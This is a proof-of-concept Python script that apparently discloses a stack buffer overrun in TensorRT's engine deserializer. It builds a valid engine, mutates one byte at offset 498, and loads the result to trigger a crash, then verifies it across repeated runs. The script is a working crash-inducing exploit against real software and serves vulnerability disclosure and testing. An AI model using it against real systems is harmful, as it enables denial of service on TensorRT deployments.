tensorrt-stack-overrun-poc / vuln009_standalone_poc.py
treforbenbow's picture
Upload vuln009_standalone_poc.py with huggingface_hub
f145112 verified
"""
VULN-009: Stack Buffer Overrun in TensorRT Engine Deserializer
================================================================
A single-byte mutation in the NGNE (engine graph) section of a valid
TensorRT engine file triggers STATUS_STACK_BUFFER_OVERRUN (0xC0000409)
during deserializeCudaEngine().
This indicates stack-based buffer overflow detected by Windows /GS stack
cookie protection. The crash occurs in the closed-source libnvinfer.dll
engine parser.
CWE: CWE-121 (Stack-based Buffer Overflow)
Distinct from VULN-006 (CWE-125, Out-of-bounds Read / ACCESS_VIOLATION)
Distinct from VULN-008 (CWE-369, Integer Divide-by-Zero)
To reproduce:
1. python vuln009_standalone_poc.py build (builds valid + crash engines)
2. python vuln009_standalone_poc.py crash (loads crash engine, triggers crash)
3. python vuln009_standalone_poc.py verify (full verification)
"""
import os, sys, struct, subprocess, time
import numpy as np
POC_DIR = os.path.dirname(os.path.abspath(__file__))
VALID_PATH = os.path.join(POC_DIR, "vuln009_valid.engine")
CRASH_PATH = os.path.join(POC_DIR, "vuln009_crash.engine")
# Crash offset and value (from full scan)
CRASH_OFFSET = 498
CRASH_VALUE = 0xFF
ORIGINAL_VALUE = 0x00
def cmd_build():
"""Build valid engine, then create crash variant."""
import tensorrt as trt
from onnx import helper, TensorProto, numpy_helper
print("[*] Building valid BatchNorm TensorRT engine...")
bn_s = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_s")
bn_b = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_b")
bn_m = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_m")
bn_v = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_v")
g = helper.make_graph(
[helper.make_node("BatchNormalization", ["x", "bn_s", "bn_b", "bn_m", "bn_v"], ["output"])],
"batchnorm",
[helper.make_tensor_value_info("x", TensorProto.FLOAT, [1, 8, 4, 4])],
[helper.make_tensor_value_info("output", TensorProto.FLOAT, None)],
[bn_s, bn_b, bn_m, bn_v])
model = helper.make_model(g, opset_imports=[helper.make_opsetid("", 17)])
model.ir_version = 8
logger = trt.Logger(trt.Logger.WARNING)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
assert parser.parse(model.SerializeToString()), "Parse failed"
config = builder.create_builder_config()
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
engine_bytes = builder.build_serialized_network(network, config)
assert engine_bytes, "Build failed"
engine_data = bytes(engine_bytes)
# Save valid engine
with open(VALID_PATH, "wb") as f:
f.write(engine_data)
print(f"[+] Valid engine: {VALID_PATH} ({len(engine_data)} bytes)")
# Verify it loads
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(engine_data)
assert engine, "Valid engine failed to load"
print(f"[+] Valid engine loads OK")
# Create crash variant
mutated = bytearray(engine_data)
print(f"[*] Mutating byte at offset {CRASH_OFFSET}: 0x{engine_data[CRASH_OFFSET]:02x} -> 0x{CRASH_VALUE:02x}")
mutated[CRASH_OFFSET] = CRASH_VALUE
with open(CRASH_PATH, "wb") as f:
f.write(bytes(mutated))
print(f"[+] Crash engine: {CRASH_PATH} ({len(mutated)} bytes)")
print(f"[+] Build complete. Run 'python {os.path.basename(__file__)} crash' to trigger.")
def cmd_crash():
"""Load the crash engine (will trigger STATUS_STACK_BUFFER_OVERRUN)."""
import tensorrt as trt
if not os.path.exists(CRASH_PATH):
print("[-] Crash engine not found. Run 'build' first.")
sys.exit(1)
print(f"[*] Loading crash engine: {CRASH_PATH}")
print(f"[*] Expecting STATUS_STACK_BUFFER_OVERRUN (0xC0000409)...")
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
with open(CRASH_PATH, "rb") as f:
data = f.read()
# This call will crash with STATUS_STACK_BUFFER_OVERRUN
engine = runtime.deserialize_cuda_engine(data)
if engine:
print("[!] Engine loaded (unexpected - crash should have occurred)")
else:
print("[*] Engine rejected (no crash, but deserialization failed)")
def cmd_verify():
"""Full verification: test in subprocess, confirm crash type."""
if not os.path.exists(VALID_PATH) or not os.path.exists(CRASH_PATH):
print("[-] Engine files not found. Run 'build' first.")
sys.exit(1)
print("[1] Testing valid engine...")
rc1 = _test_engine_subprocess(VALID_PATH)
print(f" Return code: {rc1}")
assert rc1 == 0, "Valid engine should load OK"
print("[2] Testing crash engine...")
rc2 = _test_engine_subprocess(CRASH_PATH)
print(f" Return code: {rc2}")
if rc2 == 3221226505:
print("[+] CONFIRMED: STATUS_STACK_BUFFER_OVERRUN (0xC0000409)")
print("[+] CWE-121: Stack-based Buffer Overflow")
print("[+] This is a DISTINCT vulnerability from VULN-006 (ACCESS_VIOLATION)")
elif rc2 == 3221225477:
print("[!] ACCESS_VIOLATION (0xC0000005) - different crash type")
else:
print(f"[?] Unexpected return code: {rc2}")
# Show diff
valid = open(VALID_PATH, "rb").read()
crash = open(CRASH_PATH, "rb").read()
diffs = [(i, valid[i], crash[i]) for i in range(min(len(valid), len(crash))) if valid[i] != crash[i]]
print(f"\n[3] Difference between valid and crash engines:")
for off, v, c in diffs:
print(f" Offset {off}: 0x{v:02x} -> 0x{c:02x}")
# Reproducibility test
print(f"\n[4] Reproducibility test (10 runs)...")
results = []
for i in range(10):
rc = _test_engine_subprocess(CRASH_PATH)
results.append(rc)
crash_count = sum(1 for r in results if r == 3221226505)
print(f" Stack overrun: {crash_count}/10 runs")
print(f" Return codes: {results}")
def _test_engine_subprocess(engine_path):
"""Test engine loading in subprocess. Returns exit code."""
code = f"""
import tensorrt as trt
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
with open(r"{engine_path}", "rb") as f:
engine = runtime.deserialize_cuda_engine(f.read())
print("OK" if engine else "FAIL")
"""
try:
r = subprocess.run([sys.executable, "-c", code],
capture_output=True, text=True, timeout=15)
return r.returncode
except subprocess.TimeoutExpired:
return -999
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: python {os.path.basename(__file__)} [build|crash|verify]")
sys.exit(1)
cmd = sys.argv[1]
if cmd == "build":
cmd_build()
elif cmd == "crash":
cmd_crash()
elif cmd == "verify":
cmd_verify()
else:
print(f"Unknown command: {cmd}")
sys.exit(1)